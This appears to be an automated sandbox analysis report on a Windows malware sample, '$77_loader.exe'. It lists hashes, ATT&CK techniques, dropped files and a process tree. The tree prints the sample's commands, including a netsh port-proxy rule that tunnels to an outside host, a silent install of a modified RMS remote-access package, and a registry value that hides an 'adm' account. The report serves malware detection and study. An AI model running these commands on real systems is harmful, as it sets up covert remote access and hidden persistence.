3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

Analysis

max time kernel
153s
max time network
153s
platform
windows7_x64
resource
win7-20220414-en
submitted
16-04-2022 05:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$77_loader.exe
Size

397KB
MD5

aff57ee1a4f3731c2036046910f78fb4
SHA1

ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256

3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512

5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score

8^/10

discovery evasion persistence

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1112	RMS.exe
860	installer.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
1112	RMS.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	$77_loader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	$77_loader.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2032	NETSTAT.EXE
1224	NETSTAT.EXE
1600	NETSTAT.EXE
684	NETSTAT.EXE
1860	NETSTAT.EXE
1252	NETSTAT.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1884	$77_loader.exe
1884	$77_loader.exe
1884	$77_loader.exe
1884	$77_loader.exe
1884	$77_loader.exe
1884	$77_loader.exe
1884	$77_loader.exe
860	installer.exe
860	installer.exe
860	installer.exe
860	installer.exe
860	installer.exe
860	installer.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1884	$77_loader.exe
Token: SeRestorePrivilege	432	msiexec.exe
Token: SeTakeOwnershipPrivilege	432	msiexec.exe
Token: SeSecurityPrivilege	432	msiexec.exe
Token: SeDebugPrivilege	2032	NETSTAT.EXE
Token: SeDebugPrivilege	1224	NETSTAT.EXE
Token: SeDebugPrivilege	1600	NETSTAT.EXE
Token: SeDebugPrivilege	684	NETSTAT.EXE
Token: SeDebugPrivilege	1860	NETSTAT.EXE
Token: SeDebugPrivilege	1252	NETSTAT.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
860	installer.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 1884 wrote to memory of 1604	1884	$77_loader.exe	27
PID 1884 wrote to memory of 1604	1884	$77_loader.exe	27
PID 1884 wrote to memory of 1604	1884	$77_loader.exe	27
PID 1604 wrote to memory of 1312	1604	csc.exe	29
PID 1604 wrote to memory of 1312	1604	csc.exe	29
PID 1604 wrote to memory of 1312	1604	csc.exe	29
PID 1884 wrote to memory of 1632	1884	$77_loader.exe	31
PID 1884 wrote to memory of 1632	1884	$77_loader.exe	31
PID 1884 wrote to memory of 1632	1884	$77_loader.exe	31
PID 1884 wrote to memory of 948	1884	$77_loader.exe	34
PID 1884 wrote to memory of 948	1884	$77_loader.exe	34
PID 1884 wrote to memory of 948	1884	$77_loader.exe	34
PID 1884 wrote to memory of 2032	1884	$77_loader.exe	35
PID 1884 wrote to memory of 2032	1884	$77_loader.exe	35
PID 1884 wrote to memory of 2032	1884	$77_loader.exe	35
PID 1884 wrote to memory of 1224	1884	$77_loader.exe	36
PID 1884 wrote to memory of 1224	1884	$77_loader.exe	36
PID 1884 wrote to memory of 1224	1884	$77_loader.exe	36
PID 1884 wrote to memory of 1600	1884	$77_loader.exe	37
PID 1884 wrote to memory of 1600	1884	$77_loader.exe	37
PID 1884 wrote to memory of 1600	1884	$77_loader.exe	37
PID 1884 wrote to memory of 1608	1884	$77_loader.exe	38
PID 1884 wrote to memory of 1608	1884	$77_loader.exe	38
PID 1884 wrote to memory of 1608	1884	$77_loader.exe	38
PID 1884 wrote to memory of 1280	1884	$77_loader.exe	39
PID 1884 wrote to memory of 1280	1884	$77_loader.exe	39
PID 1884 wrote to memory of 1280	1884	$77_loader.exe	39
PID 1884 wrote to memory of 1328	1884	$77_loader.exe	40
PID 1884 wrote to memory of 1328	1884	$77_loader.exe	40
PID 1884 wrote to memory of 1328	1884	$77_loader.exe	40
PID 1884 wrote to memory of 600	1884	$77_loader.exe	41
PID 1884 wrote to memory of 600	1884	$77_loader.exe	41
PID 1884 wrote to memory of 600	1884	$77_loader.exe	41
PID 1884 wrote to memory of 1548	1884	$77_loader.exe	42
PID 1884 wrote to memory of 1548	1884	$77_loader.exe	42
PID 1884 wrote to memory of 1548	1884	$77_loader.exe	42
PID 1884 wrote to memory of 684	1884	$77_loader.exe	43
PID 1884 wrote to memory of 684	1884	$77_loader.exe	43
PID 1884 wrote to memory of 684	1884	$77_loader.exe	43
PID 1884 wrote to memory of 1860	1884	$77_loader.exe	44
PID 1884 wrote to memory of 1860	1884	$77_loader.exe	44
PID 1884 wrote to memory of 1860	1884	$77_loader.exe	44
PID 1884 wrote to memory of 1252	1884	$77_loader.exe	45
PID 1884 wrote to memory of 1252	1884	$77_loader.exe	45
PID 1884 wrote to memory of 1252	1884	$77_loader.exe	45
PID 1884 wrote to memory of 1112	1884	$77_loader.exe	47
PID 1884 wrote to memory of 1112	1884	$77_loader.exe	47
PID 1884 wrote to memory of 1112	1884	$77_loader.exe	47
PID 1884 wrote to memory of 1112	1884	$77_loader.exe	47
PID 1112 wrote to memory of 860	1112	RMS.exe	48
PID 1112 wrote to memory of 860	1112	RMS.exe	48
PID 1112 wrote to memory of 860	1112	RMS.exe	48
PID 1112 wrote to memory of 860	1112	RMS.exe	48
PID 1112 wrote to memory of 860	1112	RMS.exe	48
PID 1112 wrote to memory of 860	1112	RMS.exe	48
PID 1112 wrote to memory of 860	1112	RMS.exe	48
PID 860 wrote to memory of 1280	860	installer.exe	49
PID 860 wrote to memory of 1280	860	installer.exe	49
PID 860 wrote to memory of 1280	860	installer.exe	49
PID 860 wrote to memory of 1280	860	installer.exe	49
PID 860 wrote to memory of 1280	860	installer.exe	49
PID 860 wrote to memory of 1280	860	installer.exe	49
PID 860 wrote to memory of 1280	860	installer.exe	49

C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1884
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7pfhmfid.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4C5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE419.tmp"
    3⤵
    PID:1312
- C:\Windows\system32\chcp.com
  "C:\Windows\system32\chcp.com" 437
  2⤵
  PID:1632
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:948
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1224
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy reset
  2⤵
  PID:1608
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1280
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
  2⤵
  PID:1328
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:600
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1548
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:684
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1860
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Users\Admin\AppData\Local\Temp\RMS.exe
  "C:\Users\Admin\AppData\Local\Temp\RMS.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:860
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
      4⤵
      PID:1280

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi

Filesize
7.4MB

MD5
73e578a44265558d3ace212869d43cbb

SHA1
d2c15578def8996ed0ae4a44754055b774b095a7

SHA256
8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

SHA512
fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7pfhmfid.dll

Filesize
3KB

MD5
196e4191a5c2d9ed3c16732d8bd89653

SHA1
3283fb09f93b2c5d6aa4e5b88f46a492fbab6270

SHA256
12ac6124bada4d415df7594e7897612a7474917bd354f5076790dc4e72292936

SHA512
90af409c12b294deda59e9cb602fd62e97255788e504eba58be4de28045a83de55c116ce2c030db03022577659b69a7439858eb45ff7ac70bcdd27763be8bcff

Download Submit
C:\Users\Admin\AppData\Local\Temp\7pfhmfid.pdb

Filesize
11KB

MD5
30856c96c1615aadf1f11875bda8acb7

SHA1
38335c38f1c7164c9c0b481125f6e43c4bd69035

SHA256
27b3acece18342543cc3cc33a70f49b9a0cb2eb5b4d8d6199086b2ac6bf63e85

SHA512
9091b445e9c62dddf0bbb88a37d9fdfbaabcc38d22cd87965145334560a5431036f35e0f1e0b71e6062fd3054fd736f8a8320cf0774753c96f2a97e4534e9e67

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE4C5.tmp

Filesize
1KB

MD5
ecd44e1b05ff5cbe348452205cb6817c

SHA1
2dfd14c7d0bb084048b29be433cb5272e2600381

SHA256
4700e9591d1c219c9c439a0fb3b8146f4b7e9169bfcfd6775ebaab3dd6f54076

SHA512
f7487ef9e5c251fe66bc189664c3036ca02934e4493e68ce8f34e92d88c90d1b89be66cf0d484f606069ff35521ecd1d7da0d47abcedad7cc2336aa440b9a761

Download Submit
C:\Users\Admin\AppData\Local\Temp\RMS.exe

Filesize
8.3MB

MD5
73f351beae5c881fafe36f42cde9a47c

SHA1
dc1425cfd5569bd59f5d56432df875b59da9300b

SHA256
a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

SHA512
f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Download Submit
C:\Users\Admin\AppData\Local\Temp\RMS.exe

Filesize
8.3MB

MD5
73f351beae5c881fafe36f42cde9a47c

SHA1
dc1425cfd5569bd59f5d56432df875b59da9300b

SHA256
a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

SHA512
f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7pfhmfid.0.cs

Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7pfhmfid.cmdline

Filesize
309B

MD5
64a68a4e66e77da60bb5f7eaaf57dc48

SHA1
4e9c01d758238621db4e48393ea6e27bb69e61ce

SHA256
03cd1f7dd37dca5b739c158b6b49ae163d1b7876b5efc5a85d8c0a67e0560a33

SHA512
f4203c58151d4a360d9078607f40ce180b1f7aab4bd56ec74f606cd283411d0a071d280aff18b98db44d467413b7d71e02aab9fbd35d5b3fca8905a783f608da

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE419.tmp

Filesize
652B

MD5
bfff1fdd1891d6abe22a5190674c5f75

SHA1
b332bba58f14ffecb0c65dfab1bf3f2768b9f5b8

SHA256
31cc624c565faf405fe313eba91211316e01eed91cf9608230d19e214ff7339f

SHA512
2e3296eea0ea31b33cc2244f59c22893d5e4aae1e183e9468595948eac63d4990474e84b102d17f31cdd25de4bf6c7d79a456ec22c341e24551cd191888a13df

Download Submit
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
memory/432-65-0x000007FEFBCA1000-0x000007FEFBCA3000-memory.dmp

Filesize
8KB

Download
memory/1112-87-0x0000000075191000-0x0000000075193000-memory.dmp

Filesize
8KB

Download
memory/1884-84-0x000000001B580000-0x000000001B599000-memory.dmp

Filesize
100KB

Download
memory/1884-54-0x000007FEF39D0000-0x000007FEF4A66000-memory.dmp

Filesize
16.6MB

Download
memory/1884-55-0x000007FEEE760000-0x000007FEEF2BD000-memory.dmp

Filesize
11.4MB

Download